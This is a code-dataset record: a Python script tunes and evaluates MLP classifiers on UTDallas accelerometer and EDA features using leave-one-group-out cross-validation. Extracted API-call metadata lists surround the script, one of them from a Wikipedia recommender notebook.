i2p, u2i)\n', (21001, 21095), True, 'import wikirecs as wr\n'), ((21188, 21241), 'recommenders.MostFrequentRecommender', 'recommenders.MostFrequentRecommender', (['histories_train'], {}), '(histories_train)\n', (21224, 21241), False, 'import recommenders\n'), ((21333, 21389), 'wikirecs.save_pickle', 'wr.save_pickle', (['frecs', "('../' + rec_name + '_recs.pickle')"], {}), "(frecs, '../' + rec_name + '_recs.pickle')\n", (21347, 21389), True, 'import wikirecs as wr\n'), ((21411, 21524), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'frecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, frecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (21430, 21524), True, 'import wikirecs as wr\n'), ((21577, 21631), 'recommenders.MyBM25Recommender', 'recommenders.MyBM25Recommender', (['model', 'implicit_matrix'], {}), '(model, implicit_matrix)\n', (21607, 21631), False, 'import recommenders\n'), ((21751, 21807), 'wikirecs.save_pickle', 'wr.save_pickle', (['brecs', "('../' + rec_name + '_recs.pickle')"], {}), "(brecs, '../' + rec_name + '_recs.pickle')\n", (21765, 21807), True, 'import wikirecs as wr\n'), ((21865, 21978), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'brecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, brecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (21884, 21978), True, 'import wikirecs as wr\n'), ((22170, 22235), 'wikirecs.save_pickle', 'wr.save_pickle', (['brecs_filtered', "('../' + rec_name + '_recs.pickle')"], {}), "(brecs_filtered, '../' + rec_name + '_recs.pickle')\n", (22184, 22235), True, 'import wikirecs as wr\n'), ((22257, 22386), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', "recs['bm25_filtered']", 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), "(histories_dev, recs['bm25_filtered'], K,\n discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)\n", (22276, 22386), True, 'import wikirecs as wr\n'), ((22427, 22556), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', "recs['bm25_filtered']", 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), "(histories_dev, recs['bm25_filtered'], K,\n discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)\n", (22446, 22556), True, 'import wikirecs as wr\n'), ((22632, 22688), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../als200_bm25_model_2021-05-28.pickle"""'], {}), "('../als200_bm25_model_2021-05-28.pickle')\n", (22646, 22688), True, 'import wikirecs as wr\n'), ((22888, 22944), 'wikirecs.save_pickle', 'wr.save_pickle', (['irecs', "('../' + rec_name + '_recs.pickle')"], {}), "(irecs, '../' + rec_name + '_recs.pickle')\n", (22902, 22944), True, 'import wikirecs as wr\n'), ((23476, 23541), 'wikirecs.save_pickle', 'wr.save_pickle', (['irecs_filtered', "('../' + rec_name + '_recs.pickle')"], {}), "(irecs_filtered, '../' + rec_name + '_recs.pickle')\n", (23490, 23541), True, 'import wikirecs as wr\n'), ((23628, 23679), 'recommenders.MostRecentRecommender', 'recommenders.MostRecentRecommender', (['histories_train'], {}), '(histories_train)\n', (23662, 23679), False, 'import recommenders\n'), ((23771, 23886), 'recommenders.JaccardRecommender', 'recommenders.JaccardRecommender', (['implicit_matrix'], {'p2i': 'p2i', 't2i': 't2i', 'i2t': 'i2t', 'i2p': 'i2p', 'n2i': 'n2i', 'u2i': 'u2i', 'i2u': 'i2u'}), '(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t,\n i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)\n', (23802, 23886), False, 'import recommenders\n'), ((24156, 24202), 'wikirecs.save_pickle', 'wr.save_pickle', (['jrecs', '"""jaccard-1_recs.pickle"""'], {}), "(jrecs, 'jaccard-1_recs.pickle')\n", (24170, 24202), True, 'import wikirecs as wr\n'), ((24244, 24357), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'jrecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, jrecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (24263, 24357), True, 'import wikirecs as wr\n'), ((24378, 24513), 'wikirecs.display_recs_with_history', 'wr.display_recs_with_history', (['jrecs', 'userids[:30]', 'histories_test', 'histories_train', 'p2t', 'u2n'], {'recs_to_display': '(5)', 'hist_to_display': '(10)'}), '(jrecs, userids[:30], histories_test,\n histories_train, p2t, u2n, recs_to_display=5, hist_to_display=10)\n', (24406, 24513), True, 'import wikirecs as wr\n'), ((24586, 24701), 'recommenders.JaccardRecommender', 'recommenders.JaccardRecommender', (['implicit_matrix'], {'p2i': 'p2i', 't2i': 't2i', 'i2t': 'i2t', 'i2p': 'i2p', 'n2i': 'n2i', 'u2i': 'u2i', 'i2u': 'i2u'}), '(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t,\n i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)\n', (24617, 24701), False, 'import recommenders\n'), ((25535, 25571), 'recommenders.InterleaveRecommender', 'recommenders.InterleaveRecommender', ([], {}), '()\n', (25569, 25571), False, 'import recommenders\n'), ((25648, 25706), 'wikirecs.save_pickle', 'wr.save_pickle', (['intrecs', "('../' + rec_name + '_recs.pickle')"], {}), "(intrecs, '../' + rec_name + '_recs.pickle')\n", (25662, 25706), True, 'import wikirecs as wr\n'), ((25731, 25846), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'intrecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, intrecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (25750, 25846), True, 'import wikirecs as wr\n'), ((31005, 31101), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'results_df', 'x': '"""ndcg_discover"""', 'y': '"""ndcg_resurface"""', 'hover_name': '"""index"""'}), "(data_frame=results_df, x='ndcg_discover', y='ndcg_resurface',\n hover_name='index')\n", (31015, 31101), True, 'import plotly.express as px\n'), ((31206, 31306), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'results_df', 'x': '"""recall_discover"""', 'y': '"""recall_resurface"""', 'hover_name': '"""index"""'}), "(data_frame=results_df, x='recall_discover', y='recall_resurface',\n hover_name='index')\n", (31216, 31306), True, 'import plotly.express as px\n'), ((31635, 31666), 'seaborn.set_theme', 'sns.set_theme', ([], {'style': '"""darkgrid"""'}), "(style='darkgrid')\n", (31648, 31666), True, 'import seaborn as sns\n'), ((31667, 31767), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'font.size': 48, 'figure.figsize': (8, 5), 'legend.edgecolor': 'k'}"], {}), "({'font.size': 48, 'figure.figsize': (8, 5),\n 'legend.edgecolor': 'k'})\n", (31693, 31767), False, 'import matplotlib\n'), ((31763, 31790), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (31773, 31790), True, 'import matplotlib.pyplot as plt\n'), ((32073, 32093), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '""":k"""'], {}), "(x, y, ':k')\n", (32081, 32093), True, 'import matplotlib.pyplot as plt\n'), ((32154, 32182), 'matplotlib.pyplot.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': '(3)'}), "('xtick', labelsize=3)\n", (32160, 32182), True, 'import matplotlib.pyplot as plt\n'), ((32266, 32295), 'matplotlib.rc', 'matplotlib.rc', (['"""font"""'], {}), "('font', **font)\n", (32279, 32295), False, 'import matplotlib\n'), ((32297, 32317), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '""":k"""'], {}), "(x, y, ':k')\n", (32305, 32317), True, 'import matplotlib.pyplot as plt\n'), ((32317, 32351), 'matplotlib.pyplot.plot', 'plt.plot', (['A', 'B', '"""."""'], {'MarkerSize': '(15)'}), "(A, B, '.', MarkerSize=15)\n", (32325, 32351), True, 'import matplotlib.pyplot as plt\n'), ((32709, 32759), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Recall@20 discovery (%)"""'], {'fontsize': '(20)'}), "('Recall@20 discovery (%)', fontsize=20)\n", (32719, 32759), True, 'import matplotlib.pyplot as plt\n'), ((32759, 32809), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Recall@20 resurface (%)"""'], {'fontsize': '(20)'}), "('Recall@20 resurface (%)', fontsize=20)\n", (32769, 32809), True, 'import matplotlib.pyplot as plt\n'), ((32809, 32825), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 3]'], {}), '([0, 3])\n', (32817, 32825), True, 'import matplotlib.pyplot as plt\n'), ((32825, 32843), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[-2, 85]'], {}), '([-2, 85])\n', (32833, 32843), True, 'import matplotlib.pyplot as plt\n'), ((32850, 32859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32857, 32859), True, 'import matplotlib.pyplot as plt\n'), ((33146, 33205), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_dev_2021-05-28.feather"""'], {}), "('../histories_dev_2021-05-28.feather')\n", (33166, 33205), False, 'from pyarrow import feather\n'), ((33207, 33235), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 10)'}), '(figsize=(15, 10))\n', (33217, 33235), True, 'import matplotlib.pyplot as plt\n'), ((33396, 33425), 'matplotlib.pyplot.legend', 'plt.legend', (['recommender_names'], {}), '(recommender_names)\n', (33406, 33425), True, 'import matplotlib.pyplot as plt\n'), ((33427, 33455), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 10)'}), '(figsize=(15, 10))\n', (33437, 33455), True, 'import matplotlib.pyplot as plt\n'), ((33605, 33634), 'matplotlib.pyplot.legend', 'plt.legend', (['recommender_names'], {}), '(recommender_names)\n', (33615, 33634), True, 'import matplotlib.pyplot as plt\n'), ((33636, 33664), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 10)'}), '(figsize=(15, 10))\n', (33646, 33664), True, 'import matplotlib.pyplot as plt\n'), ((33814, 33843), 'matplotlib.pyplot.legend', 'plt.legend', (['recommender_names'], {}), '(recommender_names)\n', (33824, 33843), True, 'import matplotlib.pyplot as plt\n'), ((33880, 33911), 'seaborn.set_theme', 'sns.set_theme', ([], {'style': '"""darkgrid"""'}), "(style='darkgrid')\n", (33893, 33911), True, 'import seaborn as sns\n'), ((33912, 34012), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'font.size': 18, 'figure.figsize': (8, 5), 'legend.edgecolor': 'k'}"], {}), "({'font.size': 18, 'figure.figsize': (8, 5),\n 'legend.edgecolor': 'k'})\n", (33938, 34012), False, 'import matplotlib\n'), ((34006, 34033), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (34016, 34033), True, 'import matplotlib.pyplot as plt\n'), ((34208, 34306), 'matplotlib.pyplot.legend', 'plt.legend', (["['ALS', 'BM25']"], {'title': '"""Algorithm"""', 'fontsize': '(16)', 'title_fontsize': '(16)', 'facecolor': '"""w"""'}), "(['ALS', 'BM25'], title='Algorithm', fontsize=16, title_fontsize=\n 16, facecolor='w')\n", (34218, 34306), True, 'import matplotlib.pyplot as plt\n'), ((34301, 34330), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""@N"""'], {'fontsize': '(20)'}), "('@N', fontsize=20)\n", (34311, 34330), True, 'import matplotlib.pyplot as plt\n'), ((34330, 34377), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Discovery recall (%)"""'], {'fontsize': '(20)'}), "('Discovery recall (%)', fontsize=20)\n", (34340, 34377), True, 'import matplotlib.pyplot as plt\n'), ((37355, 37424), 'recommenders.ImplicitCollaborativeRecommender', 'recommenders.ImplicitCollaborativeRecommender', (['model', 'implicit_matrix'], {}), '(model, implicit_matrix)\n', (37400, 37424), False, 'import recommenders\n'), ((37948, 37972), 'numpy.random.shuffle', 'np.random.shuffle', (['index'], {}), '(index)\n', (37965, 37972), True, 'import numpy as np\n'), ((38219, 38243), 'numpy.random.shuffle', 'np.random.shuffle', (['index'], {}), '(index)\n', (38236, 38243), True, 'import numpy as np\n'), ((38888, 38918), 'numpy.array', 'np.array', (['[r[1] for r in runs]'], {}), '([r[1] for r in runs])\n', (38896, 38918), True, 'import numpy as np\n'), ((38935, 38952), 'numpy.sum', 'np.sum', (['(lens == 1)'], {}), '(lens == 1)\n', (38941, 38952), True, 'import numpy as np\n'), ((12242, 12290), 'numpy.sum', 'np.sum', (['(implicit_matrix[:, veditors] > 0)'], {'axis': '(1)'}), '(implicit_matrix[:, veditors] > 0, axis=1)\n', (12248, 12290), True, 'import numpy as np\n'), ((12626, 12677), 'wikirecs.print_user_history', 'wr.print_user_history', (['all_histories'], {'user': 'i2n[ved]'}), '(all_histories, user=i2n[ved])\n', (12647, 12677), True, 'import wikirecs as wr\n'), ((28147, 28168), 'pandas.DataFrame', 'pd.DataFrame', (['results'], {}), '(results)\n', (28159, 28168), True, 'import pandas as pd\n'), ((28530, 28584), 'seaborn.scatterplot', 'sns.scatterplot', (['x', 'y'], {'data': 'data', 'size': '(8)', 'legend': '(False)'}), '(x, y, data=data, size=8, legend=False)\n', (28545, 28584), True, 'import seaborn as sns\n'), ((28887, 28903), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (28896, 28903), True, 'import matplotlib.pyplot as plt\n'), ((28908, 28926), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (28918, 28926), True, 'import matplotlib.pyplot as plt\n'), ((28931, 28949), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (28941, 28949), True, 'import matplotlib.pyplot as plt\n'), ((33030, 33076), 'wikirecs.load_pickle', 'wr.load_pickle', (["('../' + rname + '_recs.pickle')"], {}), "('../' + rname + '_recs.pickle')\n", (33044, 33076), True, 'import wikirecs as wr\n'), ((33286, 33333), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)'], {}), '(histories_dev, recs[rname], 20)\n', (33301, 33333), True, 'import wikirecs as wr\n'), ((33368, 33396), 'matplotlib.pyplot.plot', 'plt.plot', (['recall_curve', '""".-"""'], {}), "(recall_curve, '.-')\n", (33376, 33396), True, 'import matplotlib.pyplot as plt\n'), ((33506, 33572), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)', 'discovery_userids'], {}), '(histories_dev, recs[rname], 20, discovery_userids)\n', (33521, 33572), True, 'import wikirecs as wr\n'), ((33577, 33605), 'matplotlib.pyplot.plot', 'plt.plot', (['recall_curve', '""".-"""'], {}), "(recall_curve, '.-')\n", (33585, 33605), True, 'import matplotlib.pyplot as plt\n'), ((33715, 33781), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)', 'resurface_userids'], {}), '(histories_dev, recs[rname], 20, resurface_userids)\n', (33730, 33781), True, 'import wikirecs as wr\n'), ((33786, 33814), 'matplotlib.pyplot.plot', 'plt.plot', (['recall_curve', '""".-"""'], {}), "(recall_curve, '.-')\n", (33794, 33814), True, 'import matplotlib.pyplot as plt\n'), ((34081, 34147), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)', 'discovery_userids'], {}), '(histories_dev, recs[rname], 20, discovery_userids)\n', (34096, 34147), True, 'import wikirecs as wr\n'), ((34392, 34411), 'numpy.arange', 'np.arange', (['(0)', '(20)', '(2)'], {}), '(0, 20, 2)\n', (34401, 34411), True, 'import numpy as np\n'), ((35535, 35637), 'pandas.DataFrame', 'pd.DataFrame', (['{rec_name: [p2t[r] for r in recs[rec_name][userid][:N]] for rec_name in\n recs_subset}'], {}), '({rec_name: [p2t[r] for r in recs[rec_name][userid][:N]] for\n rec_name in recs_subset})\n', (35547, 35637), True, 'import pandas as pd\n'), ((37028, 37141), 'pandas.DataFrame', 'pd.DataFrame', (["{rec_name: [p2t[r] for r in recs[rec_name][n2u['HenryXVII']]][:N] for\n rec_name in recs_subset}"], {}), "({rec_name: [p2t[r] for r in recs[rec_name][n2u['HenryXVII']]][\n :N] for rec_name in recs_subset})\n", (37040, 37141), True, 'import pandas as pd\n'), ((38336, 38421), 'wikirecs.print_user_history', 'wr.print_user_history', ([], {'user': 'edited_pages.index[i]', 'all_histories': 'clean_histories'}), '(user=edited_pages.index[i], all_histories=clean_histories\n )\n', (38357, 38421), True, 'import wikirecs as wr\n'), ((1229, 1248), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (1246, 1248), False, 'import logging\n'), ((2517, 2571), 'pandas.concat', 'pd.concat', (['[all_histories, oneuser]'], {'ignore_index': '(True)'}), '([all_histories, oneuser], ignore_index=True)\n', (2526, 2571), True, 'import pandas as pd\n'), ((2868, 2892), 'numpy.arange', 'np.arange', (['(0)', '(20000)', '(200)'], {}), '(0, 20000, 200)\n', (2877, 2892), True, 'import numpy as np\n'), ((2989, 3009), 'numpy.arange', 'np.arange', (['(0)', '(200)', '(1)'], {}), '(0, 200, 1)\n', (2998, 3009), True, 'import numpy as np\n'), ((3128, 3150), 'numpy.median', 'np.median', (['edit_counts'], {}), '(edit_counts)\n', (3137, 3150), True, 'import numpy as np\n'), ((6531, 6547), 'numpy.array', 'np.array', (['is_bot'], {}), '(is_bot)\n', (6539, 6547), True, 'import numpy as np\n'), ((11130, 11151), 'pandas.DataFrame', 'pd.DataFrame', (['oneuser'], {}), '(oneuser)\n', (11142, 11151), True, 'import pandas as pd\n'), ((12311, 12359), 'numpy.sum', 'np.sum', (['(implicit_matrix[:, veditors] > 0)'], {'axis': '(1)'}), '(implicit_matrix[:, veditors] > 0, axis=1)\n', (12317, 12359), True, 'import numpy as np\n'), ((14600, 14620), 'numpy.arange', 'np.arange', (['(0)', '(100)', '(1)'], {}), '(0, 100, 1)\n', (14609, 14620), True, 'import numpy as np\n'), ((14686, 14706), 'numpy.arange', 'np.arange', (['(0)', '(100)', '(1)'], {}), '(0, 100, 1)\n', (14695, 14706), True, 'import numpy as np\n'), ((16966, 16977), 'umap.UMAP', 'umap.UMAP', ([], {}), '()\n', (16975, 16977), False, 'import umap\n'), ((17210, 17253), 'numpy.sum', 'np.sum', (['implicit_matrix[indices, :]'], {'axis': '(1)'}), '(implicit_matrix[indices, :], axis=1)\n', (17216, 17253), True, 'import numpy as np\n'), ((17891, 17940), 'numpy.sum', 'np.sum', (['implicit_matrix[actor_indices, :]'], {'axis': '(1)'}), '(implicit_matrix[actor_indices, :], axis=1)\n', (17897, 17940), True, 'import numpy as np\n'), ((18053, 18064), 'umap.UMAP', 'umap.UMAP', ([], {}), '()\n', (18062, 18064), False, 'import umap\n'), ((23547, 23568), 'pandas.DataFrame', 'pd.DataFrame', (['results'], {}), '(results)\n', (23559, 23568), True, 'import pandas as pd\n'), ((34410, 34429), 'numpy.arange', 'np.arange', (['(0)', '(20)', '(2)'], {}), '(0, 20, 2)\n', (34419, 34429), True, 'import numpy as np\n'), ((38482, 38504), 'numpy.arange', 'np.arange', (['(0)', '(2000)', '(20)'], {}), '(0, 2000, 20)\n', (38491, 38504), True, 'import numpy as np\n'), ((5531, 5559), 'numpy.sum', 'np.sum', (['is_popular_page_edit'], {}), '(is_popular_page_edit)\n', (5537, 5559), True, 'import numpy as np\n'), ((6592, 6609), 'numpy.sum', 'np.sum', (['keep_user'], {}), '(keep_user)\n', (6598, 6609), True, 'import numpy as np\n'), ((16687, 16730), 'numpy.sum', 'np.sum', (['implicit_matrix[nonzero, :]'], {'axis': '(1)'}), '(implicit_matrix[nonzero, :], axis=1)\n', (16693, 16730), True, 'import numpy as np\n'), ((17303, 17346), 'numpy.sum', 'np.sum', (['implicit_matrix[indices, :]'], {'axis': '(1)'}), '(implicit_matrix[indices, :], axis=1)\n', (17309, 17346), True, 'import numpy as np\n'), ((17990, 18039), 'numpy.sum', 'np.sum', (['implicit_matrix[actor_indices, :]'], {'axis': '(1)'}), '(implicit_matrix[actor_indices, :], axis=1)\n', (17996, 18039), True, 'import numpy as np\n'), ((25112, 25166), 'wikirecs.prop_resurface', 'wr.prop_resurface', (['jrecs', 'K', 'implicit_matrix', 'i2p', 'u2i'], {}), '(jrecs, K, implicit_matrix, i2p, u2i)\n', (25129, 25166), True, 'import wikirecs as wr\n'), ((32446, 32455), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32453, 32455), True, 'import matplotlib.pyplot as plt\n'), ((32562, 32571), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32569, 32571), True, 'import matplotlib.pyplot as plt\n'), ((32641, 32650), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32648, 32650), True, 'import matplotlib.pyplot as plt\n'), ((34161, 34183), 'numpy.array', 'np.array', (['recall_curve'], {}), '(recall_curve)\n', (34169, 34183), True, 'import numpy as np\n'), ((34482, 34491), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (34489, 34491), True, 'import matplotlib.pyplot as plt\n'), ((34561, 34570), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (34568, 34570), True, 'import matplotlib.pyplot as plt\n'), ((38805, 38825), 'itertools.groupby', 'itertools.groupby', (['d'], {}), '(d)\n', (38822, 38825), False, 'import itertools\n'), ((2459, 2480), 'pandas.DataFrame', 'pd.DataFrame', (['oneuser'], {}), '(oneuser)\n', (2471, 2480), True, 'import pandas as pd\n'), ((4596, 4629), 'itertools.groupby', 'itertools.groupby', (['d'], {'key': 'keyfunc'}), '(d, key=keyfunc)\n', (4613, 4629), False, 'import itertools\n'), ((25035, 25070), 'wikirecs.recall', 'wr.recall', (['histories_test', 'jrecs', 'K'], {}), '(histories_test, jrecs, K)\n', (25044, 25070), True, 'import wikirecs as wr\n'), ((25219, 25287), 'wikirecs.recall', 'wr.recall', (['histories_test', 'jrecs', 'K'], {'userid_subset': 'discovery_userids'}), '(histories_test, jrecs, K, userid_subset=discovery_userids)\n', (25228, 25287), True, 'import wikirecs as wr\n'), ((25340, 25408), 'wikirecs.recall', 'wr.recall', (['histories_test', 'jrecs', 'K'], {'userid_subset': 'resurface_userids'}), '(histories_test, jrecs, K, userid_subset=resurface_userids)\n', (25349, 25408), True, 'import wikirecs as wr\n'), ((32483, 32500), 'numpy.array', 'np.array', (['xyz[1:]'], {}), '(xyz[1:])\n', (32491, 32500), True, 'import numpy as np\n'), ((5652, 5680), 'numpy.sum', 'np.sum', (['is_popular_page_edit'], {}), '(is_popular_page_edit)\n', (5658, 5680), True, 'import numpy as np\n'), ((6648, 6665), 'numpy.sum', 'np.sum', (['keep_user'], {}), '(keep_user)\n', (6654, 6665), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 23 12:03:59 2017
@author: Kevin
"""
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import LeaveOneGroupOut,GridSearchCV
dataPath = 'UTDallas/'
dataName = 'UTD'
nJobs = 12 # Number of cores to use
# Load feature matrices, labels, and groups (denoting which labeled time
# segment each row of the feature matrix comes from)
featuresAll = np.loadtxt(dataPath+dataName+'_all.csv',delimiter=',')
featuresAcc = np.loadtxt(dataPath+dataName+'_acc.csv',delimiter=',')
featuresEda = np.loadtxt(dataPath+dataName+'_eda.csv',delimiter=',')
labels = np.loadtxt(dataPath+dataName+'_label.csv')
groups = np.loadtxt(dataPath+dataName+'_groups.csv')
# Indicates the subjects that have no MAs, in order to exclude them during grid search
includeRowsTrain = np.logical_and(
np.logical_and(np.where(groups!=5,True,False),
np.where(groups!=17,True,False)),np.where(groups!=18,True,False))
# Leave-one-group-out cross-validation
cv = LeaveOneGroupOut()
# Parameter tuning by grid search
solver='lbfgs'
activation='relu'
regParam = 10.0**np.arange(-3,5)
# Comment out one of the choices below (either 1 or 2 hidden layers)
# 1 hidden layer
hiddenLayerSizes = 2**np.arange(0,8)
"""
# 2 hidden layers
hidden1,hidden2 = np.meshgrid(2**np.arange(0,8),2**np.arange(0,8))
hiddenLayerSizes = np.reshape(np.stack([hidden1,hidden2]),
(2,np.size(hidden1))).T.tolist()
"""
parameters = {'alpha': regParam,
'hidden_layer_sizes': hiddenLayerSizes}
gsAll = GridSearchCV(MLPClassifier(solver=solver,activation=activation),
parameters,'roc_auc',n_jobs=nJobs,cv=cv,refit=False,
verbose=1)
gsAll.fit(featuresAll[includeRowsTrain,:],labels[includeRowsTrain],
groups[includeRowsTrain])
bestAlphaAll = gsAll.best_params_['alpha']
bestHiddenSizesAll = gsAll.best_params_['hidden_layer_sizes']
gsAcc = GridSearchCV(MLPClassifier(solver=solver,activation=activation),
parameters,'roc_auc',n_jobs=nJobs,cv=cv,refit=False,
verbose=1)
gsAcc.fit(featuresAcc[includeRowsTrain,:],labels[includeRowsTrain],
groups[includeRowsTrain])
bestAlphaAcc = gsAcc.best_params_['alpha']
bestHiddenSizesAcc = gsAcc.best_params_['hidden_layer_sizes']
gsEda = GridSearchCV(MLPClassifier(solver=solver,activation=activation),
parameters,'roc_auc',n_jobs=nJobs,cv=cv,refit=False,
verbose=1)
gsEda.fit(featuresEda[includeRowsTrain,:],labels[includeRowsTrain],
groups[includeRowsTrain])
bestAlphaEda = gsEda.best_params_['alpha']
bestHiddenSizesEda = gsEda.best_params_['hidden_layer_sizes']
predAll = np.zeros(np.shape(labels))
predAcc = np.zeros(np.shape(labels))
predEda = np.zeros(np.shape(labels))
for train, test in cv.split(featuresAll,labels,groups):
mlpAll = MLPClassifier(hidden_layer_sizes=bestHiddenSizesAll,
solver=solver,alpha=bestAlphaAll)
mlpAll.fit(featuresAll[train,:],labels[train])
predAll[test] = mlpAll.predict_proba(featuresAll[test,:])[:,1]
mlpAcc = MLPClassifier(hidden_layer_sizes=bestHiddenSizesAcc,
solver=solver,alpha=bestAlphaAcc)
mlpAcc.fit(featuresAcc[train,:],labels[train])
predAcc[test] = mlpAcc.predict_proba(featuresAcc[test,:])[:,1]
mlpEda = MLPClassifier(hidden_layer_sizes=bestHiddenSizesEda,
solver=solver,alpha=bestAlphaEda)
mlpEda.fit(featuresEda[train,:],labels[train])
predEda[test] = mlpEda.predict_proba(featuresEda[test,:])[:,1]
# Save the scores for further analysis
#np.save('MLPpredAllScores_UTD',predAll)
#np.save('MLPpredAccScores_UTD',predAcc)
#np.save('MLPpredEdaScores_UTD',predEda)
print('MLP AUC ALL: %f (%s)' % (roc_auc_score(labels,predAll),gsAll.best_params_))
print('MLP AUC ACC: %f (%s)' % (roc_auc_score(labels,predAcc),gsAcc.best_params_))
print('MLP AUC EDA: %f (%s)' % (roc_auc_score(labels,predEda),gsEda.best_params_))
|
[
"sklearn.metrics.roc_auc_score",
"numpy.shape",
"numpy.where",
"numpy.arange",
"numpy.loadtxt",
"sklearn.neural_network.MLPClassifier",
"sklearn.model_selection.LeaveOneGroupOut"
] |
[((480, 539), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_all.csv')"], {'delimiter': '""","""'}), "(dataPath + dataName + '_all.csv', delimiter=',')\n", (490, 539), True, 'import numpy as np\n'), ((549, 608), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_acc.csv')"], {'delimiter': '""","""'}), "(dataPath + dataName + '_acc.csv', delimiter=',')\n", (559, 608), True, 'import numpy as np\n'), ((618, 677), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_eda.csv')"], {'delimiter': '""","""'}), "(dataPath + dataName + '_eda.csv', delimiter=',')\n", (628, 677), True, 'import numpy as np\n'), ((682, 728), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_label.csv')"], {}), "(dataPath + dataName + '_label.csv')\n", (692, 728), True, 'import numpy as np\n'), ((734, 781), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_groups.csv')"], {}), "(dataPath + dataName + '_groups.csv')\n", (744, 781), True, 'import numpy as np\n'), ((1066, 1084), 'sklearn.model_selection.LeaveOneGroupOut', 'LeaveOneGroupOut', ([], {}), '()\n', (1082, 1084), False, 'from sklearn.model_selection import LeaveOneGroupOut, GridSearchCV\n'), ((988, 1023), 'numpy.where', 'np.where', (['(groups != 18)', '(True)', '(False)'], {}), '(groups != 18, True, False)\n', (996, 1023), True, 'import numpy as np\n'), ((1170, 1186), 'numpy.arange', 'np.arange', (['(-3)', '(5)'], {}), '(-3, 5)\n', (1179, 1186), True, 'import numpy as np\n'), ((1296, 1311), 'numpy.arange', 'np.arange', (['(0)', '(8)'], {}), '(0, 8)\n', (1305, 1311), True, 'import numpy as np\n'), ((1644, 1695), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'solver': 'solver', 'activation': 'activation'}), '(solver=solver, activation=activation)\n', (1657, 1695), False, 'from sklearn.neural_network import MLPClassifier\n'), ((2033, 2084), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'solver': 'solver', 'activation': 'activation'}), '(solver=solver, activation=activation)\n', (2046, 2084), False, 'from sklearn.neural_network import MLPClassifier\n'), ((2422, 2473), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'solver': 'solver', 'activation': 'activation'}), '(solver=solver, 